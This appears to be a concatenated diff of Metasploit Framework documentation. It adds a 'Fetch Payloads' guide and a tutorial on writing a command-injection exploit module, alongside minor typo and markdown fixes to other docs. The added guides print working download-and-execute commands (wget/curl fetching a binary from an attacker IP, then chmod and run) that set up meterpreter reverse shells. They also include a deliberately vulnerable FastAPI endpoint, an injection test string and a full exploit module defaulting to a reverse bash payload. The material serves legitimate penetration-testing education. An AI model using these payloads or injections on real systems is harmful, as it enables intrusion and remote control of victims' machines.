-stagers you can use.  As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to wite a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit.  It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.
+stagers you can use.  As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to write a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit.  It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.

 Available flavors:

@@ -0,0 +1,334 @@
+# Fetch Payloads
+
+## What Are Fetch Payloads?
+Fetch payloads are adapted, command-based payloads use network-enabled binaries on a remote host to download binary 
+payloads to that remote host.  Adapted payloads are just payloads where we have bolted an extra feature on top of
+existing payloads to modify the behavior.  In this case, you can still use all your favorite binary payloads and
+transports, but we've added an optional fetch payload adapter on top to stage the payloads using a networking binary and
+server.  They function similarly to some Command Stagers, but are based on the payload side rather than the exploit side
+to simplify integration and portability.  Fetch payloads are a fast, easy way to get a session on a target that has a
+command injection or code execution vulnerability *and* a known binary with the ability to download and store
+a file.
+
+## Terminology
+In the following documentation, it is useful to agree on certain terms to use so we don't get confused or confusing.
+`Fetch Payload` - The command to execute on the remote host to retrieve and execute the `Served Payload`
+`Fetch Binary` - The binary we are using on the remote host to download the Served Payload.  Examples might be WGET,
+cURL, or Certutil.
+`Fetch Protocol` - The protocol used to download the served payload, for example HTTP, HTTPS or TFTP.
+`Fetch Listener` - The server hosting the served payload.
+`Fetch Handler` - The same as `Fetch Listener`
+`Served Payload` - The underlying payload we want to execute.  We also might call this the `Adapted Payload`.
+`Served Payload Handler` -  The handler for the served payload. This is just a standard payload like 
+`meterpreter/reverse_tcp` or `shell_reverse_tcp`.
+
+## Organization
+Unlike Command Stagers which are organized by binary, Fetch Payloads are organized by server. Currently, we support
+HTTP, HTTPS, and TFTP servers.  Once you select a fetch payload, you can select the binary you'd like to run on the
+remote host to download the served payload prior to execution.
+
+Here is the naming convention for fetch payloads:
+`<cmd>/<platform>/<fetch protocol>/served_payload`
+For example:
+`cmd/linux/https/x64/meterpreter/reverse_tcp` Will do four things:
+
+1. Create a `linux/x64/meterpreter/reverse_tcp` elf binary to be the served payload.
+2. Serve the above served payload on an HTTPS server
+3. Start a served payload handler for the served payload to call back to
+4. Generate a command to execute on a remote host that will download the served payload and run it.
+
+
+## A Simple Stand-Alone Example
+The fastest way to understand Fetch Payloads is to use them and examine the output. For example, let's assume a Linux
+target with the ability to connect back to us with  an HTTP connection and a command execution vulnerability.
+First, let's look at the payload in isolation:
+```msf
+msf6 exploit(multi/ssh/sshexec) > use payload/cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > show options
+
+Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+FETCH_FILENAME      YXeSdwsoEfOH     no        Name to use on remote system when storing payload
+FETCH_SRVHOST       0.0.0.0          yes       Local IP to use for serving payload
+FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+FETCH_URIPATH                        no        Local URI to use for serving payload
+FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload
+LHOST                                yes       The listen address (an interface may be specified)
+LPORT               4444             yes       The listen port
+
+
+View the full module info with the info, or info -d command.
+
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+```
+
+### Options
+`FETCH_COMMAND` is the binary we wish to run on the remote host to download the adapted payload.  Currently, the
+supported options are `CURL FTP TFTP TNFTP WGET` on Linux hosts and `CURL TFTP CERTUTIL` on Windows hosts.  We'll get
+into more details on the binaries later.
+`FETCH_FILENAME` is the name you'd like the executable payload saved as on the remote host.  This option is not
+supported by every binary and must end in `.exe` on Windows hosts.  The default value is random.
+`FETCH_SRVHOST` is the IP where the server will listen.
+`FETCH_SRVPORT` is the port where the server will listen.
+`FETCH_URIPATH` is the URI corresponding to the payload file.  The default value is deterministic based on the
+underlying payload so a payload created in msfvenom will match a listener started in Framework assuming the underlying
+served payload is the same.
+`FETCH_WRITABLE_DIR` is the directory on the remote host where we'd like to store the served payload prior to execution.
+This value is not supported by all binaries.  If you set this value and it is not supported, it will generate an error.
+
+The remaining options will be the options available to you in the served payload; in this case our served payload is
+`linux/x64/meterpreter/reverse_tcp` so our only added options are `LHOST` and `LPORT`.  If we had selected a different
+payload, we would see different options.
+
+### Generating the Fetch Payload
+```msf
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_COMMAND WGET
+FETCH_COMMAND => WGET
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVHOST 10.5.135.201
+FETCH_SRVHOST => 10.5.135.201
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_SRVPORT 8000
+FETCH_SRVPORT => 8000
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LHOST 10.5.135.201
+LHOST => 10.5.135.201
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set LPORT 4567
+LPORT => 4567
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
+wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+```
+
+You can see the fetch payload generated:
+`wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &`
+This command downloads the served payload, marks it as executable, and then executes it on the remote host.
+
+### Starting the Fetch Server
+When you start the `Fetch Handler`, it starts both the server hosting the binary payload *and* the listener for the
+served payload.  With `verbose` set to `true`, you can see both the Fetch Handler and the Served Payload Handler are
+started:
+```msf
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
+[*] wget -qO ./YBybOrAmkV http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YBybOrAmkV; ./YBybOrAmkV &
+[*] Payload Handler Started as Job 0
+[*] Fetch Handler listening on 10.5.135.201:8000
+[*] http server started
+[*] Started reverse TCP handler on 10.5.135.201:4567 
+```
+
+### Fetch Handlers and Served Payload Handlers
+The Fetch Handler is tracked with the Served Payload Handler, so you will only see the Served Payload Handler under
+`Jobs`, even though the Fetch Handler is listening:
+```msf
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -l
+
+Jobs
+====
+
+  Id  Name                    Payload                                     Payload opts
+  --  ----                    -------                                     ------------
+  0   Exploit: multi/handler  cmd/linux/http/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4567
+
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
+[*] exec: netstat -ant | grep 8000
+
+tcp        0      0 10.5.135.201:8000       0.0.0.0:*               LISTEN     
+
+```
+Killing the Served Payload handler will kill the Fetch Handler as well:
+```msf
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > jobs -k 0
+[*] Stopping the following job(s): 0
+[*] Stopping job 0
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > netstat -ant | grep 8000
+[*] exec: netstat -ant | grep 8000
+
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
+```
+
+## Using Fetch Payloads on the Fly
+One really nice thing about Fetch Payloads is that it gives you the ability to execute a binary payload very quickly,
+without relying on a session in framework or having to get a payload on target.  If you have a shell session or even a
+really odd situation where you can execute commands, you can get a session in framework quickly without having to upload
+a payload manually.  Just follow the steps above, and run the provided command.  Right now, the only thing we serve are
+Framework payloads, but in the future, expanding to serve and execute any executable binary would be relatively trivial.
+
+## Using it in an exploit
+Using Fetch Payloads is no different than using any other command payload.  First, give users access to the Fetch
+payloads for a given platform by adding a target that supports `ARCH_CMD` and the desired platform, either `windows` or
+`linux`.  Once the target has been added, you can get access to the command by invoking `payload.encoded` and use it as
+the command to execute on the remote target.
+
+### Example paired with CmdStager
+There is likely to be some overlap between fetch payloads and command stagers.  Let's talk briefly about how to support 
+both in an exploit.  Please see the documentation on Command Stagers for required imports and specifics for command
+stagers.  in this case, I'm only documenting the changes to make so that fetch payloads will work alongside command
+stagers or to use fetch payloads in the style of command stagers, which I suggest you do.
+
+In this case, I've modified the code provided in the command stager documentation to support both linux and unix command
+payloads.  All I did was give an array value for the `Platform` value and change the`Type` to something more generic:
+``` ruby
+'Targets'   =>
+  [
+    [ 'Linux Command',
+      {
+        'Arch' => [ ARCH_CMD ],
+        'Platform' => [ 'unix', 'linux' ],
+        'Type' => :nix_cmd
+      }
+    ]
+  ]
+```
+
+For the `execute_command` method, nothing changes:
+
+```ruby
+def execute_command(cmd, _opts = {})
+populate_values if @sid.nil? || @token.nil?
+uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri),
+      'cookie' => 'sid=' + @sid,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'encode_params' => true,
+      'vars_post' => {
+        'token' => @token,
+        'text' => cmd,
+        'hhook' => 'exec',
+        'sid' => @sid
+      }
+    })
+end
+```
+
+The only change in the exploit method is the use of the more generic `Type` value in the case statement.  Nothing else
+needs to change.
+
+```ruby
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :nix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+```
+
+If you have an exploit that already supports Unix Command payloads and you'd like it to support Linux Command payloads
+like Fetch Payloads, you can simply add the `linux` value to the platform array:
+
+```ruby
+'Nix Command',
+  {
+    'Platform' => [ 'unix', 'linux' ],
+    'Arch' => ARCH_CMD,
+    'Type' => :unix_cmd,
+  }
+```
+
+## Supported Commands
+### Windows And Linux Both
+#### `CURL` 
+cURL comes pre-installed on Windows 10 and 11, and it is incredibly common on linux platforms and the options are very
+standardized across releases and platforms.  This makes cURL a good default choice for both Linux and Windows 
+targets.  All options and server protocol types are supported by the cURL command.
+
+#### `TFTP` 
+The TFTP binary is useful only in edge cases because of a long list of limitations:
+1) It is a Windows feature, but it is turned off by default on Windows Vista and later.
+2) While you are likely to find it on Linux and Unix hosts, the options are not standard across releases.
+3) The TFTP binary included in many Linux systems and all Windows systems does not allow for the port to be configured,
+nor does it allow for the destination filename to be configured, so `FETCH_SRVPORT` must always be set to 69 and 
+`FETCH_WRITABLE_DIR` and `FETCH_FILENAME` must be empty.  Listening on port 69 in Framework can be problematic, so I
+suggest that you use the advanced option `FetchListenerBindPort` to start the server on a different port and redirect
+the connection with a tool like iptables to a high port.
+For example, if you are on a linux host with iptables, you can execute the following commands to redirect a connection
+on UDP port 69 to UDP port 3069:
+`sudo iptables -t nat -I PREROUTING -p udp --dport 69 -j REDIRECT --to-ports 3069`
+`sudo iptables -t nat -I OUTPUT -p udp -d 127.0.0.1 --dport 69 -j REDIRECT --to-ports 3069`
+Then, you can set `FetchListenerBindPort` to 3069 and get the callback correctly.
+4) Because tftp is a udp-based protocol and because od the implementation of the server within Framework, each time you
+start a tftp fetch handler, a new service will start:
+```msf
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
+
+Jobs
+====
+
+  Id  Name                    Payload                                       Payload opts
+  --  ----                    -------                                       ------------
+  2   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4444
+
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 4445
+LPORT => 4445
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
+
+[*] Command to run on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe
+[*] Payload Handler Started as Job 4
+
+[*] starting tftpserver on 10.5.135.201:8080
+[*] Started reverse TCP handler on 10.5.135.201:4445 
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > jobs
+
+Jobs
+====
+
+  Id  Name                    Payload                                       Payload opts
+  --  ----                    -------                                       ------------
+  2   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4444
+  4   Exploit: multi/handler  cmd/windows/tftp/x64/meterpreter/reverse_tcp  tcp://10.5.135.201:4445
+
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
+[*] exec: netstat -an | grep 8080
+
+udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
+udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH test4
+FETCH_URIPATH => test4
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > set LPORT 8547
+LPORT => 8547
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > to_handler
+
+[*] Command to run on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe
+[*] Payload Handler Started as Job 5
+
+[*] starting tftpserver on 10.5.135.201:8080
+[*] Started reverse TCP handler on 10.5.135.201:8547 
+msf6 payload(cmd/windows/tftp/x64/meterpreter/reverse_tcp) > netstat -an | grep 8080
+[*] exec: netstat -an | grep 8080
+
+udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
+udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
+udp        0      0 10.5.135.201:8080       0.0.0.0:*                          
+
+```
+There is nothing to stop you from creating a race condition by starting multiple tftp servers with the same IP, port,
+and `FETCH_URI` value but serving different payloads.  This will result in a race condition where the payload served is
+non-deterministic.
+
+
+### Windows Only
+#### `Certutil`
+Certutil is a great choice for Windows targets- it is likely to be present on most recent releases of Windows and is 
+highly configurable.  The one troublesome aspect is that there is no insecure mode for Certutil, so if you are using
+Certutil with the HTTPS protocol, the certificate must be correct and checked.  It supports `HTTP` and `HTTPS`
+protocols.
+
+### Linux Only
+#### `FTP`
+FTP is an old but useful binary.  While we support using the FTP binary, we do not have an FTP server.  Modern releases
+of FTP support both HTTP and HTTPS protocols.  Unfortunately, we only support these modern versions of inline FTP, so it
+may not be appropriate for older systems. 
+
+#### `TNFTP`
+TNFTP (not to be confused with TFTP) is a newer version of FTP.  It is exactly the same as modern FTP, but sometimes both the legacy FTP and TNFTP are
+present on a system, so the command will be `tnftp` rather than `ftp`.
+
+#### WGET
+WGET is likely the first choice for a linux-only target.  It supports both HTTPS and HTTP and all Fetch payload options.
+It is ubiquitous on Linux hosts and very standard, making it an excellent choice.
@@ -20,7 +20,7 @@ When the mixin is included, notice there will be the following datastore options
 * **SSLVerifyMode** - Verification mode: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER. Default is PEER.
 * **Proxies** - Allows your module to support proxies.
 * **ConnectTimeout** - Default is 10 seconds.
-* **TCP::max_send_size** - Evasive option. Maxiumum TCP segment size.
+* **TCP::max_send_size** - Evasive option. Maximum TCP segment size.
 * **TCP::send_delay** - Evasive option. Delays inserted before every send.

 If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"
@@ -126,4 +126,4 @@ def send_recv_once(data)

  buf
 end
-```
+```
@@ -84,7 +84,7 @@ module Metasploit
      class SymantecWebGateway < HTTP


-        # Attemps to login to the server.
+        # Attempts to login to the server.
        #
        # @param [Metasploit::Framework::Credential] credential The credential information.
        # @return [Result] A Result object indicating success or failure
@@ -68,13 +68,13 @@ def on_request_uri(cli, request)
 end
 ```

-Of course, when you write a Metasploit browser exploit there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provies all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or checkout existing code examples (especially the recent ones).
+Of course, when you write a Metasploit browser exploit there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provides all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or checkout existing code examples (especially the recent ones).

 To get things started, you can always use the following template to start developing your browser exploit:

 ```ruby
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

@@ -37,6 +37,10 @@ The `CheckCode` also supports an optional description which is printed by the fr
 return CheckCode::Appears('Vulnerable component XYZ is installed')
 ```

+`MetasploitModule#check` methods should capture any known `raise` from methods called and return value of class
+`Msf::Exploit::CheckCode`. Basically, that means avoiding the use of `fail_with` or raising exceptions that are not
+handled within the check method.
+
 ## Remote Check Example

 Here's an abstract example of how a Metasploit check might be written:
@@ -54,7 +58,7 @@ def check
  http_body = get_http_body
  if http_body
    if http_body =~ /Something CMS v1\.0/
-      # We are able to find the version thefore more precise about the vuln state
+      # We are able to find the version therefore more precise about the vuln state
      return Exploit::CheckCode::Appears
    elsif http_body =~ /Something CMS/
      # All we can tell the vulnerable app is running, but no more info to
@@ -0,0 +1,210 @@
+If you've found a way to execute a command on a target, and you'd like to make a simple exploit module to get a shell, this guide is for you. Alternatively, if you have access to **fetch** commands on the target (curl, wget, ftp, tftp, tnftp, or certutil), you can use a [[Fetch Payload|How-to-use-fetch-payloads]] for a no-code solution.
+
+By the end of this guide you'll understand how to turn [Command injection](https://owasp.org/www-community/attacks/Command_Injection) into a shell - from here, you can move on to the [[command stager|How-to-use-command-stagers]] article and upgrade your basic `:unix_cmd` Target to a Dropper for all kinds of payloads with variable command stagers.
+
+This guide assumes *some* knowledge of programming (Understand what a class is, what methods/functions are) but expects no in-depth knowledge of Metasploit internals.
+
+## A Vulnerable Service
+
+For the vulnerable service test case, we'll be using a simple FastAPI service. This is very easy to spin up:
+
+1. Install `fastapi[all]` using your preferred Python package manager (a virtual environment is recommended)
+2. Create a file to hold some Python code (I'll call it `main.py`)
+3. Copy the following code into your file:
+
+    ```python
+    from fastapi import FastAPI, Response
+    import subprocess
+
+    app = FastAPI()
+
+    @app.get("/ping")
+    def ping(ip : str):
+        res = subprocess.run(f"ping -c 1 {ip}", shell=True, capture_output=True)
+        return Response(content=res.stdout.decode("utf-8"), media_type="text/plain")
+    ```
+
+4. Start your vulnerable service with `uvicorn main:app`
+5. Test that the application works with `curl`:
+
+    ```sh
+    $ curl http://localhost:8000/ping?ip=1.1.1.1
+    PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
+    64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.7 ms
+
+    --- 1.1.1.1 ping statistics ---
+    1 packets transmitted, 1 received, 0% packet loss, time 0ms
+    rtt min/avg/max/mdev = 16.739/16.739/16.739/0.000 ms
+    ```
+
+6. Test that your application is exploitable - also with `curl`:
+
+    ```sh
+    $ curl localhost:8000/ping?ip=1.1.1.1%20%26%26id
+    PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
+    64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.6 ms
+
+    --- 1.1.1.1 ping statistics ---
+    1 packets transmitted, 1 received, 0% packet loss, time 0ms
+    rtt min/avg/max/mdev = 16.614/16.614/16.614/0.000 ms
+    uid=1000(meta) gid=1000(meta)
+    ```
+
+With this output `uid=1000(meta) gid=1000(meta)`, we know that the `id` command successfully executed on the target system. Now that we have a vulnerable application we can write a module to pwn it.
+
+## The Structure of a Module
+
+To have a functioning command injection Metasploit module we **need** a few things:
+
+1. Create a subclass of `Msf::Exploit::Remote`
+2. Include the `Msf::Exploit::Remote::HttpClient` mixin
+3. Define three methods:
+   - `initialize`, which defines metadata for the Module
+   - `execute_command`, which is what runs the command against the remote server
+   - `exploit`, wraps `execute_command`, and can handle some logic when we move to a cmdstager module
+4. (Not required, but recommended) a method to substitute or escape bad characters, to be used inside `execute_command`. This could also just be done inside `execute_command` instead of a separate function call.
+
+### Where to put a Module
+
+Metasploit looks for custom modules at `$HOME/.msf4/modules`, but the way you get modules there varies based on how you're running Metasploit.
+
+- If you have a full install of Metasploit on your host, you can just add your custom module to `$HOME/.msf4/modules/exploits/custom_mod.rb`.
+  - You can also just add a module to Metasploit's modules folder - This can be helpful when troubleshooting, but it's not recommended
+- **Docker** If you're using the [Docker Image](https://github.com/rapid7/metasploit-framework/tree/master/docker), you can also add modules to `$HOME/.msf4/modules` and that folder will be mounted as a volume inside the Docker container
+  - You can also change the mount point by modifying the [docker-compose](https://github.com/rapid7/metasploit-framework/blob/master/docker-compose.yml) file
+
+For testing, the easiest thing to do is the simplest. You can find Metasploit's **exploit** directory, copy a file, rename it, and go from there.
+
+## A Shell of a Module
+
+The shell of a module that follows the above format is something like this:
+
+```ruby
+class MetasploitModule < msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    # empty for now
+  end
+
+  def filter_bad_chars(cmd)
+    # empty for now
+  end
+
+  def execute_command(cmd, _opts = {})
+    # empty for now
+  end
+
+  def exploit
+    # empty for now
+  end
+end
+```
+
+This covers every essential point from [The Structure of a Module](#the-structure-of-a-module), although it won't run yet.
+
+## Initialize
+
+The `initialize` method is used to define and pass metadata. Every `initialize` method in the metasploit-framework codebase follows the format of an empty `info` being passed into `update_info`, which gets passed to the `msf::Exploit::Remote` `initialize` method:
+
+```ruby
+def initialize(info = {})
+  super(
+    update_info(
+      info,
+      # Here is where the metadata goes
+      'Name' => 'Command Injection against a test Ping endpoint',
+      'Description' => 'This exploits a command injection vulnerability against a test application',
+      'License' => MSF_LICENSE,
+      'Author' => 'YOUR NAME',
+      'References' => [
+        ['URL', 'https://metasploit.com/']
+      ],
+      'DisclosureDate' => '2023-08-04',
+      'Platform' => 'linux', # used for determining compatibility - if you're doing code injection, this may be the language of the webapp
+      'Targets' => [
+        'Unix Command',
+        {
+          'Platform' => ['linux', 'unix'], # linux and unix have different cmd payloads, this gives you more options
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_cmd, # Running a command - this would be `:linux_dropper` for a cmdstager dropper
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/reverse_bash',
+            'RPORT' => 8000,
+          }
+        }
+      ],
+      'Payload' => {
+        'BadChars' => '\x00',
+      }
+      'Notes' => { # Required for new modules https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS]
+      }
+      # Some more metadata options are here: https://docs.metasploit.com/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module
+    )
+  )
+end
+```
+
+All that this method does is register metadata to the module.
+
+## Filtering
+
+It's important to ensure that payloads being sent are properly encoded. As an example, if you send a request to the `/ping` endpoint that looks like `/ping?ip=1.1.1.1&&id`, you won't see the "uid=1000(meta) gid=1000(meta)" in the response because `&` is a special character in HTTP.
+
+Encoding requirements might change based on the application you're trying to inject, so experiment if things aren't working.
+
+```ruby
+def filter_bad_chars(cmd)
+  return cmd
+    .gsub(/&/, '%26')
+    .gsub(/ /, '%20')
+end
+```
+
+`filter_bad_chars` takes in `cmd`, which is a string. `cmd` has two substitutions applied - the first will translate `&` to `%26`, the second translates a space to `%20`. The `.gsub` statements are a global substitution across the string, so the entire payload is impacted by the substitutions here (Similar to str.replace in Python). Regardless of whether or not the string is modified, it is returned.
+
+## Execution
+
+The `execute_command` method takes in `cmd` and `_opts` and executes the command on the target. In our case, executing a command is simply adding the command to a GET request and sending it to the `/ping` endpoint on our sample service.
+
+```ruby
+def execute_command(cmd, _opts = {})
+  send_request_cgi({
+    'method' => 'GET',
+    'uri' => '/ping',
+    'encode_params' => false,
+    'vars_get' => {
+      'ip' => "bing.com%20%26%26%20#{filter_bad_chars(cmd)}",
+    }
+  })
+end
+```
+
+We don't even need to handle the output of `send_request_cgi` (Really, there should be no return until the shell exits, since the call to `subprocess.run` doesn't return until that shell dies).
+
+## Exploitation
+
+To finish up, all we need is to define the `exploit` method. This method is called by Metasploit when you use `run` within a msfconsole. All that we'll do here is print a little status message and run the exploit, but later you can modify this method to handle droppers as well:
+
+```ruby
+def exploit
+  print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+  execute_command(payload.encoded)
+end
+```
+
+If you're running Metasploit and the vulnerable Python service on the same machine, you should be able to simply set the variables and fire:
+
+```sh
+set RHOST 127.0.0.1
+set LHOST 127.0.0.1
+run
+```
+
+## Conclusion
+
+That's it. Put it all together and you have a very simple Command Injection exploit module that shows you the basics of how to throw a payload. Play around with different payloads, follow the [[How-to-use-command-stagers]] guide, add some logging to the Python web server, and watch executions over Wireshark. You'll learn a lot.
@@ -8,7 +8,7 @@ Here is how you can set it up:

 ```ruby
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

@@ -54,16 +54,16 @@ In addition, we're going to add a magical line to the config file that will let

 So, open up `metasploit-framework/.git/config` with your favorite editor, add an upstream remote, and add the pull request refs for both your and Rapid7's forks. In the end, you should have a section that started off like this:

-````config
+```config
 [remote "upstream"]
  fetch = +refs/heads/*:refs/remotes/upstream/*
  fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*
  url = https://github.com/rapid7/metasploit-framework
-````
+```

 And now it looks like this:

-````config
+```config
 [remote "upstream"]
  fetch = +refs/heads/*:refs/remotes/upstream/*
  fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*
@@ -72,13 +72,13 @@ And now it looks like this:
  fetch = +refs/heads/*:refs/remotes/origin/*
  fetch = +refs/pull/*/head:refs/remotes/origin/pr/*
  url = https://github.com/YOURNAME/metasploit-framework
-````
+```

 Some people like to copy these over into remotes named "rapid7" and "yourusername" just so they don't have to remember about "origin" and "upstream," but for this doc, we'll just assume you have "origin" and "upstream" defined like this.

 Now, you can git fetch the remote PRs. This will take a little bit, since we have a couple dozen MBs of pull request data. Storage is cheap, though, right?

-````
+```
 $ git fetch --all
 Fetching todb-r7
 remote: Counting objects: 13, done.
@@ -97,7 +97,7 @@ From https://github.com/rapid7/metasploit-framework
 [... bunches of tags and PRs ...]
 * [new ref]         refs/pull/1701/head -> upstream/pr/1701
 * [new ref]         refs/pull/1702/head -> upstream/pr/1702
-````
+```

 You can `git fetch` a remote any time, and you'll get access to the latest changes to all branches and pull requests.

@@ -105,7 +105,7 @@ You can `git fetch` a remote any time, and you'll get access to the latest chang

 A manageable strategy for dealing with outstanding PRs is to start pre-merge testing on the pull request in isolation. For example, to work on PR #1217, we would:

-````
+```
 $ git checkout upstream/pr/1217
 Note: checking out 'upstream/pr/1217'.

@@ -124,7 +124,7 @@ HEAD is now at 9e499e5... Make BindTCP test more robust

 ```
 $ git checkout -b landing-1217
-````
+```

 Now, we're on a local branch identical to the original pull request, and can move on from there. We can make our changes, isolated from master, and then either send them back to the contributor (this requires looking up the original contributor's GitHub username and branch name on GitHub), or if there aren't any changes or the changes are trivial, we can land them (if you have committer rights to Rapid7's repo, this is where you land them to the upstream repo).

@@ -173,7 +173,7 @@ You need to add their fork once as a remote: `git remote add OTHER_USER git://gi

 # Making changes

-````
+```
 $ gvim .gitignore
 [... make some changes and some commits ...]
 (landing-1217) todb@mazikeen:~/git/rapid7/metasploit-framework
@@ -184,19 +184,19 @@ $ git push origin pr1271-fix-gitignore-conflict
 (pr1217-fix-gitignore-conflict) todb@mazikeen:~/git/rapid7/metasploit-framework
 $ git pr-url schierlm javapayload-maven
 Created new window in existing browser session.
-````
+```

 This sequence does a few things after editing `.gitconfig`. It creates another copy of landing-1217 (which is itself a copy of upstream/pr/1217)). Next, I push those changes to my branch (todb-r7, aka "origin"). Finally, I have a mighty [.gitconfig alias here](https://gist.github.com/todb-r7/5438391) to open a browser window to send a pull request to the original contributor's branch (you will want to edit yours to reflect your real GitHub username, of course).

-````
+```ini
 pr-url = !"echo https://github.com/YOURNAME/metasploit-framework/pull/new/HISNAME:HISBRANCH...YOURBRANCH"
-````
+```

 Filling in the blanks (provided by the original PR's information from GitHub) gets me:

-````
+```
 https://github.com/todb-r7/metasploit-framework/pull/new/schierlm:javapayload-maven...pr1217-fix-gitignore-conflict
-````
+```

 I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once [@schierlm](https://github.com/schierlm) landed it on his branch (again, using `git merge --no-ff` and a short, informational merge commit message), all I (or anyone) had to do was `git fetch` to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue.

